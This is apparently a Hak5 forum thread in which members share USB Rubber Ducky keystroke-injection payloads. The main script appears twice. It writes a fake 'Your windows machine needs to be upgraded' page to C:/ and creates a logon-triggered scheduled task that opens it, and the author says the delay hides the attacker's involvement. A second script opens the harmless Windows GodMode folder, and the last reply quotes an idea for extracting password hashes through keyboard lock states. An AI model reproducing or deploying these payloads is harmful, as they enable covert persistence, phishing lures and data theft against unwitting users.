Jump to content

Recommended Posts

Posted (edited)

This idea was to set a scheduled task to run on logon, in this case load an HTML page.

Instead of the content/exploit being setup instantly, i.e when your still near the target machine, it would be scheduled to run later to erase any suspicion that you were involved.

Just another concept for the ducky community:)

REM Author : Stuntz
REM Description : Creates index.html stored in C:/ and automatically opens it when user logs in.
REM Version : 0.1
CONTROL ESCAPE
DELAY 200
STRING notepad.exe
DELAY 200
MENU
DELAY 100
STRING a
ENTER
DELAY 200
LEFT
ENTER
DELAY 500
STRING <html>
ENTER
STRING <body>
ENTER
STRING <h1>Your windows machine needs to be upgraded</h1>
ENTER
STRING <input type="submit" value="Update Now" />
ENTER
STRING HAK5 DUCKY
ENTER
CONTROL s
DELAY 100
STRING index.html
TAB
DOWNARROW
DOWNARROW
TAB
TAB
TAB
TAB
TAB
ENTER
STRING C:/
ENTER
SHIFT TAB
DELAY 100
SHIFT TAB
DELAY 100
ENTER
DELAY 100
ALT F4
DELAY 100
CONTROL ESCAPE
DELAY 200
STRING cmd
DELAY 200
MENU
DELAY 100
STRING a
ENTER
DELAY 200
LEFT
ENTER
DELAY 1000
STRING schtasks /Create /TN Hak5Update /SC ONLOGON /TR "C:\index.html"
ENTER
DELAY 100
STRING exit
ENTER

Just read on another post from Darren that with the new firmware the Ducky will support on board file storage so that kind of eliminates the need of this to download a file.Oh well might be of some use.

Edited by tbstuntz
Posted (edited)

Everyone has probably come across GODMODE on windows 7 before.

This loads it so you can select lots of tools simply by using the down arrow and enter.

REM Author : Stuntz
REM Description : Opens up GOD Mode on windows 7. Allows you to access tools with down arrow and enter:)
GUI d
MENU
DELAY 100
STRING w
DELAY 100
STRING f
DELAY 100
STRING GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
ENTER
ENTER

Edited by tbstuntz
Posted

Everyone has probably come across GODMODE on windows 7 before.

This loads it so you can select lots of tools simply by using the down arrow and enter.

REM Author : Stuntz
REM Description : Opens up GOD Mode on windows 7. Allows you to access tools with down arrow and enter:)
MENU
DELAY 100
STRING w
DELAY 100
STRING f
DELAY 100
STRING GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
ENTER
ENTER

probably a good idea to throw a

GUI d

in at the start there.

just saiyan.

but a cool way to get to a fair few of the control panel tools. thanks for the share :)

there are a few other folder tricks like that which can be fun to mess with. but this is by far the most useful for the duckie xD

Posted

This idea was to set a scheduled task to run on logon, in this case load an HTML page.

Instead of the content/exploit being setup instantly, i.e when your still near the target machine, it would be scheduled to run later to erase any suspicion that you were involved.

Just another concept for the ducky community:)

REM Author : Stuntz
REM Description : Creates index.html stored in C:/ and automatically opens it when user logs in.
REM Version : 0.1
CONTROL ESCAPE
DELAY 200
STRING notepad.exe
DELAY 200
MENU
DELAY 100
STRING a
ENTER
DELAY 200
LEFT
ENTER
DELAY 500
STRING <html>
ENTER
STRING <body>
ENTER
STRING <h1>Your windows machine needs to be upgraded</h1>
ENTER
STRING <input type="submit" value="Update Now" />
ENTER
STRING HAK5 DUCKY
ENTER
CONTROL s
DELAY 100
STRING index.html
TAB
DOWNARROW
DOWNARROW
TAB
TAB
TAB
TAB
TAB
ENTER
STRING C:/
ENTER
SHIFT TAB
DELAY 100
SHIFT TAB
DELAY 100
ENTER
DELAY 100
ALT F4
DELAY 100
CONTROL ESCAPE
DELAY 200
STRING cmd
DELAY 200
MENU
DELAY 100
STRING a
ENTER
DELAY 200
LEFT
ENTER
DELAY 1000
STRING schtasks /Create /TN Hak5Update /SC ONLOGON /TR "C:\index.html"
ENTER
DELAY 100
STRING exit
ENTER

Just read on another post from Darren that with the new firmware the Ducky will support on board file storage so that kind of eliminates the need of this to download a file.Oh well might be of some use.

Hi can you post the link to the post in which he talks about the on board storage !

thanks

Posted

http://forums.hak5.org/index.php?showtopic=21103 & http://forums.hak5.org/index.php?showtopic=21125

Darren, " Brilliant! I could see adding to the firmware a function that captures capslock and numlock states. That way you could, albeit slowly, send data back to the duck without using conventional means. For example, if capslock represented 1 and numlock 0, with the right payload you could extract hash data from a target machine and send their binary equivelents back to the ducky."

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...